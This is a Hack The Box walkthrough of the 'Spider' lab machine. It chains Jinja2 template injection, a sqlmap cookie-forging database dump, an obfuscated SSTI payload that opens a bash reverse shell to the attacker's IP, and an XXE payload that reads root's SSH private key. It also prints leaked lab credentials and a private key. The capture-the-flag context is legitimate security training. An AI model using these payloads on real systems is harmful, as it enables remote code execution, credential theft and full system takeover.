Hack-The-Box-walkthrough[spider]

Posted on 2021-06-04 Edited on 2021-10-24 In HackTheBox walkthrough Views: Word count in article: 2.8k Reading time ≈ 10 mins.

introduce

OS: Linux
Difficulty: Hard
Points: 40
Release: 29 May 2021
IP: 10.10.10.243

Recon

using nmap

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.243
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two ports open 22:ssh 80:http

Port-80

It’s redirect to spider.htb.

Let’s add spider.htb in /etc/hosts file.

1	10.10.10.243 spider.htb

Now let’s go to spider.htb.

I found the username chiv inside black chair template.

Now let’s register ourself.

Now we are login but we can’t access the admin page let’s check inside user information.

My username is reflected here but i can’t change my username but we can try SSTI(Server-Side Template Injection) inside username field let’s register again with 49 username.

Now let’s check our payload work or not inside user information page.

1	http://spider.htb/user

It’s worked 😃 we get the output 49.

It’s mean the server running Jinja2 or flask. now let’s try to get config file with .

And if we check the user information page we got the config file which has SECRET_KEY

<Config {'ENV': 'production', 'DEBUG': False, 'TESTING': False, 'PROPAGATE_EXCEPTIONS': None, 'PRESERVE_CONTEXT_ON_EXCEPTION': None, 'SECRET_KEY': 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942', 'PERMANENT_SESSION_LIFETIME': datetime.timedelta(31), 'USE_X_SENDFILE': False, 'SERVER_NAME': None, 'APPLICATION_ROOT': '/', 'SESSION_COOKIE_NAME': 'session', 'SESSION_COOKIE_DOMAIN': False, 'SESSION_COOKIE_PATH': None, 'SESSION_COOKIE_HTTPONLY': True, 'SESSION_COOKIE_SECURE': False, 'SESSION_COOKIE_SAMESITE': None, 'SESSION_REFRESH_EACH_REQUEST': True, 'MAX_CONTENT_LENGTH': None, 'SEND_FILE_MAX_AGE_DEFAULT': datetime.timedelta(0, 43200), 'TRAP_BAD_REQUEST_ERRORS': None, 'TRAP_HTTP_EXCEPTIONS': False, 'EXPLAIN_TEMPLATE_LOADING': False, 'PREFERRED_URL_SCHEME': 'http', 'JSON_AS_ASCII': True, 'JSON_SORT_KEYS': True, 'JSONIFY_PRETTYPRINT_REGULAR': False, 'JSONIFY_MIMETYPE': 'application/json', 'TEMPLATES_AUTO_RELOAD': None, 'MAX_COOKIE_SIZE': 4093, 'RATELIMIT_ENABLED': True, 'RATELIMIT_DEFAULTS_PER_METHOD': False, 'RATELIMIT_SWALLOW_ERRORS': False, 'RATELIMIT_HEADERS_ENABLED': False, 'RATELIMIT_STORAGE_URL': 'memory://', 'RATELIMIT_STRATEGY': 'fixed-window', 'RATELIMIT_HEADER_RESET': 'X-RateLimit-Reset', 'RATELIMIT_HEADER_REMAINING': 'X-RateLimit-Remaining', 'RATELIMIT_HEADER_LIMIT': 'X-RateLimit-Limit', 'RATELIMIT_HEADER_RETRY_AFTER': 'Retry-After', 'UPLOAD_FOLDER': 'static/uploads'}>

Now let’s try to dump the database with sqlmap with help of this SECRET_KEY.

But first install the req to use that SECRET_KEY

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# pip3 install flask_unsign
Collecting flask_unsign
  Downloading flask-unsign-0.1.0.tar.gz (14 kB)
Requirement already satisfied: flask in /usr/lib/python3/dist-packages (from flask_unsign) (1.1.2)
Requirement already satisfied: itsdangerous in /usr/lib/python3/dist-packages (from flask_unsign) (1.1.0)
Requirement already satisfied: markupsafe in /usr/lib/python3/dist-packages (from flask_unsign) (1.1.1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from flask_unsign) (2.25.1)
Requirement already satisfied: werkzeug in /usr/lib/python3/dist-packages (from flask_unsign) (1.0.1)
Building wheels for collected packages: flask-unsign
  Building wheel for flask-unsign (setup.py) ... done
  Created wheel for flask-unsign: filename=flask_unsign-0.1.0-py3-none-any.whl size=13473 sha256=4168d0cfaed3b2508b4cb3d43f3a3f8f0786e931388d95ba5d46e2e7fa29c6fe
  Stored in directory: /root/.cache/pip/wheels/81/5a/d6/17703dd669250a72d9985b79b419f38307ba20678f71daadeb
Successfully built flask-unsign
Installing collected packages: flask-unsign
Successfully installed flask-unsign-0.1.0

Now we all set let’s run the sqlmap.

Imp : In first question of sqlmap you need to type “Y” and after that you will type “n”

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dump
        ___
       __H__                                                                                                                       
 ___ ___[']_____ ___ ___  {1.5.4#stable}                                                                                           
|_ -| . [.]     | .'| . |                                                                                                          
|___|_  [.]_|_|_|__,|  _|                                                                                                          
      |_|V...       |_|   http://sqlmap.org                                                                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:09:40 /2021-06-04/

custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] y
[10:09:42] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:09:42] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[10:09:42] [INFO] testing connection to the target URL
[10:09:44] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[10:09:47] [INFO] target URL content is stable
[10:09:47] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] n
[10:09:49] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
[10:09:51] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[10:09:52] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[10:09:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:10:06] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:10:08] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:10:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:10:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[10:10:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[10:10:35] [INFO] testing 'Generic inline queries'
[10:10:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:10:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[10:10:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[10:10:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:11:11] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 
[10:11:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:11:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:12:00] [INFO] target URL appears to be UNION injectable with 1 columns
[10:12:03] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session=' AND (SELECT 1456 FROM (SELECT(SLEEP(5)))zGio) AND 'IMkG'='IMkG

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: session=' UNION ALL SELECT CONCAT(0x7162717a71,0x477a7a5770686c685a45574950634d4446784e46646d594a4c664f75705a787175564d6c4e72484b,0x716a626271)-- -
---
[10:12:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[10:12:20] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:12:20] [INFO] fetching current database
[10:12:21] [INFO] fetching tables for database: 'shop'
[10:12:22] [INFO] fetching columns for table 'items' in database 'shop'
[10:12:24] [INFO] fetching entries for table 'items' in database 'shop'
Database: shop
Table: items
[6 entries]
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| id | name        | price | image_path                                        | description                                                             |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| 1  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 2  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
| 3  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 4  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
| 5  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 6  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+

[10:12:25] [INFO] table 'shop.items' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/items.csv'
[10:12:25] [INFO] fetching columns for table 'users' in database 'shop'
[10:12:26] [INFO] fetching entries for table 'users' in database 'shop'
Database: shop
Table: users
[4 entries]
+----+--------------------------------------+------------+-----------------+
| id | uuid                                 | name       | password        |
+----+--------------------------------------+------------+-----------------+
| 1  | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv       | ch1VW4sHERE7331 |
| 2  | 9a13e0f6-ee27-4968-908f-0d9882c1f28a | lucifer11  | lucifer11       |
| 3  | dc63b342-e0d0-4503-945b-71a3cf365f8e | {{7*7}}    | {{7*7}}         |
| 4  | 38af247a-100f-4712-81c0-5ac1b95e8a95 | {{config}} | {{config}}      |
+----+--------------------------------------+------------+-----------------+

[10:12:28] [INFO] table 'shop.users' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/users.csv'
[10:12:28] [INFO] fetching columns for table 'support' in database 'shop'
[10:12:29] [INFO] fetching entries for table 'support' in database 'shop'
[10:12:32] [INFO] fetching number of entries for table 'support' in database 'shop'
[10:12:32] [INFO] retrieved: 
[10:12:32] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[10:14:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
0
[10:14:15] [WARNING] table 'support' in database 'shop' appears to be empty
Database: shop
Table: support
[0 entries]
+------------+---------+---------+-------------+
| support_id | contact | message | timestamp   |
+------------+---------+---------+-------------+
+------------+---------+---------+-------------+

[10:14:15] [INFO] table 'shop.support' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/support.csv'
[10:14:15] [INFO] fetching columns for table 'messages' in database 'shop'
[10:14:16] [INFO] fetching entries for table 'messages' in database 'shop'
Database: shop
Table: messages
[1 entry]
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| post_id | creator | message                                                                           | timestamp           |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| 1       | 1       | Fix the <b>/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal</b> portal! | 2020-04-24 15:02:41 |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+

[10:14:17] [INFO] table 'shop.messages' dumped to CSV file '/root/.sqlmap/output/spider.htb/dump/shop/messages.csv'
[10:14:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 84 times
[10:14:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/spider.htb'

[*] ending @ 10:14:17 /2021-06-04/

I got the uuid and Password of chiv.

1	\| 1 \| 129f60ea-30cf-4065-afb9-6be45ad38b73 \| chiv \| ch1VW4sHERE7331 \|

Now let’s try to login with chiv.

Now we have access of admin page let’s check the messages.

We got the portal link which they said fix the portal let’s go to that link and check what inside there.

1	http://spider.htb/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal

There is a support portal which we want to fix it’s mean there is a problem in support portal.

After hit and try i got the correct payload to get rev shell.

Server Side Template Injection

{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC45LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}

Just change the base64 string with your ip and port and again encode with base64 and paste it in payload.

Now after that start your netcat listner on port which you add inside payload.

Now add your payload inside both parameter and submit the req.

And now if we check our netcat listner we got the shell as chiv.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.243.
Ncat: Connection from 10.10.10.243:43612.
bash: cannot set terminal process group (1386): Inappropriate ioctl for device
bash: no job control in this shell
chiv@spider:/var/www/webapp$ id
id
uid=1000(chiv) gid=33(www-data) groups=33(www-data)
chiv@spider:/var/www/webapp$ whoami
whoami
chiv
chiv@spider:/var/www/webapp$ cd
cd
chiv@spider:~$ ls
ls
user.txt
chiv@spider:~$ cat user.txt
cat user.txt
752a1885aef326b3d705f0b7ca531e4b

And if we go inside /home/chiv/.ssh directory we got the id_rsa key.

chiv@spider:~/.ssh$ ls -la
ls -la
total 16
drwx------ 2 chiv chiv 4096 May  6 11:42 .
drwxr-xr-x 6 chiv chiv 4096 May 18 00:23 ..
-rw-r--r-- 1 chiv chiv  393 May  4 15:42 authorized_keys
-rw------- 1 chiv chiv 1679 Apr 24  2020 id_rsa
chiv@spider:~/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAmGvQ3kClVX7pOTDIdNTsQ5EzQl+ZLbpRwDgicM4RuWDvDqjV
gjWRBF5B75h/aXjIwUnMXA7XimrfoudDzjynegpGDZL2LHLsVnTkYwDq+o/MnkpS
U7tVc2i/LtGvrobrzNRFX8taAOQ561iH9xnR2pPGwHSF1/rHQqaikl9t85ESdrp9
MI+JsgXF4qwdo/zrgxGdcOa7zq6zlnwYlY2zPZZjHYxrrwbJiD7H2pQNiegBQgu7
BLRlsGclItrZB+p4w6pi0ak8NcoKVdeOLpQq0i58vXUCGqtp9iRA0UGv3xmHakM2
VTZrVb7Q0g5DGbEXcIW9oowFXD2ufo2WPXym0QIDAQABAoIBAH4cNqStOB6U8sKu
6ixAP3toF9FC56o+DoXL7DMJTQDkgubOKlmhmGrU0hk7Q7Awj2nddYh1f0C3THGs
hx2MccU32t5ASg5cx86AyLZhfAn0EIinVZaR2RG0CPrj40ezukWvG/c2eTFjo8hl
Z5m7czY2LqvtvRAGHfe3h6sz6fUrPAkwLTl6FCnXL1kCEUIpKaq5wKS1xDHma3Pc
XVQU8a7FwiqCiRRI+GqJMY0+uq8/iao20jF+aChGu2cAP78KAyQU4NIsKNnewIrq
54dWOw8lwOXp2ndmo3FdOfjm1SMNYtB5yvPR9enbu3wkX94fC/NS9OqLLMzZfYFy
f0EMoUECgYEAxuNi/9sNNJ6UaTlZTsn6Z8X/i4AKVFgUGw4sYzswWPC4oJTDDB62
nKr2o33or9dTVdWki1jI41hJCczx2gRqCGtu0yO3JaCNY5bCA338YymdVkphR9TL
j0UOJ1vHU06RFuD28orK+w0b+gVanQIiz/o57xZ1sVNaNOyJUlsenh8CgYEAxDCO
JjFKq+0+Byaimo8aGjFiPQFMT2fmOO1+/WokN+mmKLyVdh4W22rVV4v0hn937EPW
K1Oc0/hDtSSHSwI/PSN4C2DVyOahrDcPkArfOmBF1ozcR9OBAJME0rnWJm6uB7Lv
hm1Ll0gGJZ/oeBPIssqG1srvUNL/+sPfP3x8PQ8CgYEAqsuqwL2EYaOtH4+4OgkJ
mQRXp5yVQklBOtq5E55IrphKdNxLg6T8fR30IAKISDlJv3RwkZn1Kgcu8dOl/eu8
gu5/haIuLYnq4ZMdmZIfo6ihDPFjCSScirRqqzINwmS+BD+80hyOo3lmhRcD8cFb
0+62wbMv7s/9r2VRp//IE1ECgYAHf7efPBkXkzzgtxhWAgxEXgjcPhV1n4oMOP+2
nfz+ah7gxbyMxD+paV74NrBFB9BEpp8kDtEaxQ2Jefj15AMYyidHgA8L28zoMT6W
CeRYbd+dgMrWr/3pULVJfLLzyx05zBwdrkXKZYVeoMsY8+Ci/NzEjwMwuq/wHNaG
rbJt/wKBgQCTNzPkU50s1Ad0J3kmCtYo/iZN62poifJI5hpuWgLpWSEsD05L09yO
TTppoBhfUJqKnpa6eCPd+4iltr2JT4rwY4EKG0fjWWrMzWaK7GnW45WFtCBCJIf6
IleM+8qziZ8YcxqeKNdpcTZkl2VleDsZpkFGib0NhKaDN9ugOgpRXw==
-----END RSA PRIVATE KEY-----

Now let’s change our shell to ssh shell

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# ssh -i user chiv@10.10.10.243
The authenticity of host '10.10.10.243 (10.10.10.243)' can't be established.
ECDSA key fingerprint is SHA256:Z0c/GTs+BeZXyXf2c/kRC1Y+omqtI1wPaEfrz0vvYCM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.243' (ECDSA) to the list of known hosts.
Last login: Fri May 21 15:02:03 2021 from 10.10.14.7
chiv@spider:~$ id
uid=1000(chiv) gid=1000(chiv) groups=1000(chiv)
chiv@spider:~$ whoami
chiv
chiv@spider:~$ cat user.txt
752a1885aef326b3d705f0b7ca531e4b

Privilege escalation

let’s run linPEAS.

After analyzing the linPEAS output i found a service running on localhost on port 8080.

For access the port 8080 we need to forward the port.

1	ssh -i user -L 9002:localhost:8080 chiv@spider.htb

Now let’s open the firefox and got to localhost:9002

And we got the beta login page.

Let’s sign in with any username.

This is a shopping cart page where no links are working except logout and our username is also reflected.

And if we see the cookies we see a session cookie let’s try to decode this.

I use flask-unsign to decode this.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# flask-unsign --decode --cookie .eJxNjsFPgzAchf8V07OH1rGDHJGWyaSkhV8LvYE1KYMimU1kLvvf3RJjdnz58r73zmha_YTiM3roUYyAcmbpWosxV1KHWXmiP3Rx6ndm6IBFdbYkFkgqGlmoVL4BdXvrX3-gCumVzxXwpGTLTh4Sc-O3bPCUCm1zgWlkmCv7jAeu3aAIHNvR6c6zRvv10I0qAlpsi-uemqehB4P1JHD13__zZ6ytvTGK5LhV73iPCbUb4zTdeq1sZTPW8Je7P_T7BN6NEsNRPC0b63koGzPKVDyjyyNaPoc5fKEYX34BWehYFw.YLo7NA.ZN0R3IrwiVI3inmmeoi3SoM5COw
{'lxml': b'PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+bHVjaWZlcjExPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4=', 'points': 0}
┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# echo -n PCEtLSBBUEkgVmVyc2lvbiAxLjAuMCAtLT4KPHJvb3Q+CiAgICA8ZGF0YT4KICAgICAgICA8dXNlcm5hbWU+bHVjaWZlcjExPC91c2VybmFtZT4KICAgICAgICA8aXNfYWRtaW4+MDwvaXNfYWRtaW4+CiAgICA8L2RhdGE+Cjwvcm9vdD4= | base64 -d
<!-- API Version 1.0.0 -->
<root>
    <data>
        <username>lucifer11</username>
        <is_admin>0</is_admin>
    </data>
</root>

And we also see a hidden value in login view page source.

So we can do XXE(XML External Entity Injection)

Link: XXE Cheatsheet – XML External Entity Injection

After that i analize that we need to put our payload inside this hidden version field and the output is show in username field becuase the username field is reflected when we login inside that.

Now after some hit and try i got lfi and i can read inside root directory so let’s get the root id_rsa key.

For that i intercept the req of login in burp and add this payload.

1	username=%26username%3b&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--

1	username=&username;&version=1.0.0--><!DOCTYPE+foo+[<!ENTITY+username+SYSTEM+"/root/.ssh/id_rsa">+]><!--

Boom 🧨 we got the id_rsa of root.

View page source for formatter the id_rsa.

root_rsa

Now let’s save the id_rsa and ssh in and get our root.txt.

┌──(root💀kali)-[~/hackthebox/machine/spider]
└─# ssh -i root_rsa root@10.10.10.243
Last login: Mon May 31 13:58:50 2021
root@spider:~# id
uid=0(root) gid=0(root) groups=0(root)
root@spider:~# whoami
root
root@spider:~# ls
root.txt
root@spider:~# cat root.txt
6dee7d55ac7082e677f515981ce678c7